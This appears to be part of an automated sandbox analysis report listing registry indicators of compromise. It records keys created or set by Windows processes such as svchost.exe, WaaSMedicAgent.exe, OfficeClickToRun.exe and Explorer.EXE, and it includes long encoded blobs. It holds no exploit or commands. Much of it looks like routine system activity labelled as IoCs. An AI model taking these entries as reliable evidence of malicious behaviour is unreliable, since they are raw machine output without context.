\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00180012987ECC4B" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2437139445-1151884604-3026847218-1000\02jgdlocdvhdhhnb svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2437139445-1151884604-3026847218-1000\02jgdlocdvhdhhnb\DeviceId = "<Data><User username=\"02JGDLOCDVHDHHNB\"><HardwareInfo BoundTime=\"1733298440\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02qbfqxlevqhmqqd\Response Wednesday, December 04, 2024 07:47:18 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAhkRaqKQwJEqRwrgAqyEKUQAAAAACAAAAAAAQZgAAAAEAACAAAAAMP/4obpSr8yoIKnf57B0GYDPBryCB06nqxLYknUAkpQAAAAAOgAAAAAIAACAAAABHEZF06YvqdhR0OJme2dYE1Tf512t0nWJDd9qyCniBk4AHAACxIXQ/rlB9Q5uUiozmOMIKstW0msNm82pdKDSYdMfF/7uDiMSpfgH4U0Q4rPkL4afqZvheNlKhrGWZVDM6fiUu1uFnr/dUPILotG2nwenDZnUrHJj8q3adw/uWyc3K70iAjKo9ph8fXGdP6fL2li2p9lMGmXEvnph6EjuSdxuYkYJOe5YsO07KQqPquYfO8ZDakVb9C4T10fGXzilXEPjJkbQoL/QciXh7uvPOlRzli2WInwvTB7stTG+8Rf6tH/cNBk+DcrjcfRVLLsvPzIH1JLTTO7A6N+FF0/GZISSzaRprmAehf/g8/aHs2puqeNq1uBArGEpjQwIl+mXRhxcMqGf8WjPKNTUCgVUh1EBjisA+1OGNSVDpaElvSdHgp4R+lXhBawABWqkKdZ7mn7XmTrz6NzirxImnhXa3HQQhyVcMrA8m0Q3mU5DQIC+0KIxFodwj9Adlju7QmAZjJCWFUmrgpjKWYKyA9dBsK4IPcmxdq9w07Vhc0m9/kVs51N9g4GinJKzrgn2c51H8BL/5PuZFQQKelcYoUfKzWOxm5Z1EanjrtPbRKi8XbtWMG9/wTxmmUqj4Z3o5gc/w+5XtNXjOiOIuzsMeLw1e1y84P4tdQtU4nVZEO7oJRhoDeIpjYAJyWkxkgWMqdraNPUzmkYfSTTF/S0n/8q3rzrBe1ayzAsAlqux46KnDXDJ0qKvcp6fMY4x1rrwilHoBjuAgz2Jfe0KL6gbqVllwX/C56xTZ9OeHa+cIkJqdnKhd/55JYFANeN3xLaC+r7PSIZECLKtxZ4SRh/iO5AwxrXC/xYrd2d5MWc4sTHn6IrIVyTbKx4Q1zAqWEqAU3BnKxB5hs2U/nvduevYpJOMPfmUPoJB1NZwDXKDzFkASHOwds8MXx7+64WdIN7HHaQnVqNsdQKIGpkDiXx3ZM+0rzSI+RmOOXvsPnE5YVfoK8nHVEQumlN8rgxaSEH+QHOeKmlWDvcXUA49JcmBG65uHEstN+8P+0E12wkt+i2CGVsJAeXBhwrjsW34rCPbRyuADSPyiOtsCLa8xo2YvRP0kQWWB9Z033KT3YXT0aGS1f7jeY6cAqJjhDrzvvF88W6JSLHP6+nbuFzLrzCaWJePPzJYBCTwgrwoZ+xd9zm8GnYH+q3E32+JK5mps+OtmIFSIIQ3FiDwSyQQHawLMEofQ2jKcDyxd1ygO9yCTMsuAJ4l7i6A7W4Cqt4j81SFpa3HYvm5QpMsQWaS4f69fp/CwTrpTegXxDjbvmSqXWWgVIApCQakIeOUy7nZCiQgP5PKyZg5HSgnm92i73It+WSkEB38DqRZ5wTyV4ZC7IxDXCgR5d2+LsvW1s+9dEO+LdC6x1BRzxritUzgrcLh3ZLKKIfhNz5EXbcEZ4Xdj543OWtKk1YVC4loIX7rNttNn1vRyTeKKPDJ6/hFh0EsTC1d/MM8f+z2eGI84/KvVRSlQkEtXbNunWwdb5sVHTUik4rNGuZBJWFbTGYyGg+Jr11ILbgEMZbSZWEsO/cNKZpFxo59jdo+FHkIXEGT91NPxJy2W0Ak5flDCWgrFSJrN00xGroZumzwAEge3DbBJKF4dFWgarci/YKrdHGRORYCvGrDMvzw2vCEsFO88hN+OhCHUKbdXpksTc0cCwGTHsd+Al8o8IOL69+Y8N1QG8W23bpWg2zBSUXJbviX7DDqkFnOZlzYMKMdjLGg0k4FDbUu2mVXUXNbFr0kruFHRCwiuZ4BHqEg3TnG6FmlV6mtv7CBrnYQjLx1xluMbJFKxqAO5qfA34pNFXYAWL/teEA0ktfSDSCd8vBp8dS6NBq7KLQPplf4YiSkEP9aBPhNYAdxY+2hWAosPcSN6GJH4RMYfk7lEsK1VRI1hpFZ8MuqZ1Gk0cNUSjyBLX4S08/mR6legjFrCtqiWTa+mcIkLcK0ZztE27iMTMKy3b56OCX7FpmjiEr2IcUnWKFjpGpTr6DVTJsXgebvXDhaKie10b489Q6vJTN/j40MrB54b5sUiUN1OWwloFh+Y5lWW99ZFUQdHFf+EOrWNOsjqqhYoXwpN0Wv8+mYWWCMhmH316b1k5uhLWlmBytpmjm0Z0NzxhSniovcGT92emo3aLW7DLDV8K8RXqstBz4pP3a+ByAoL4aJwi6TxzMr3w4YkH/KRWyQFZz182E55wD38eqsxfpoO3odYdlX9N4//QxjElWSHLgM/ys3hqhs4J+yiDjpJlEtjNDhJlQ3d5uBg9XUkv8vFu1QHWZri6Li/iPeGjhMtisgh3nMAiVd63k9jhzZE/hvsI7GdlwcGC3cBn50Qkg0mJ7u5aaQ8isdtyLcPX9WXyOxpMO9J5dMF2QhQ2W3AEcndZOkx1SkbNUrX4G+EBahymrKyxFODWaEBNxNeHpno8W0Cdg6axlDQSUHJyLy4qUeBsIklMVEmoNq/NrDNFETPFkW5C0P4ZCu+tOFHvlzIxXqYBrs0+P2HzQONGvNO80r73EsTmVBeKYkrzySUdTrCOSNjB+mdb+GLDSUL1aLXuLYUFYfpgHBoLzSn3G1ho5OgmEE3bzpAAAAAe0Ir1cTP66J08cSAW+PS+dXaSJ1udR1+VaG4JMozbl8DwOVS2BkD0WLFATd9iHa1WeH5qpNqzwMNAxwEcoa3Vg==" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 04 Dec 2024 07:48:47 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733298526" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2437139445-1151884604-3026847218-1000\02jgdlocdvhdhhnb\DeviceId = "<Data><User username=\"02JGDLOCDVHDHHNB\"/></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02qbfqxlevqhmqqd\Request Wednesday, December 04, 2024 07:47:18 = "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" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2437139445-1151884604-3026847218-1000\02qbfqxlevqhmqqd\AppIdList svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe -
Modifies registry class 57 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\MRUListEx = ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 56003100000000004759884812004170704461746100400009000400efbe475988488459e73d2e0000006be10100000001000000000000000000000000000000d60cc7004100700070004400610074006100000016000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 = 4e0031000000000084590f3e100054656d7000003a0009000400efbe4759884884590f3e2e0000007fe10100000001000000000000000000000000000000f6fdc700540065006d007000000014000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} 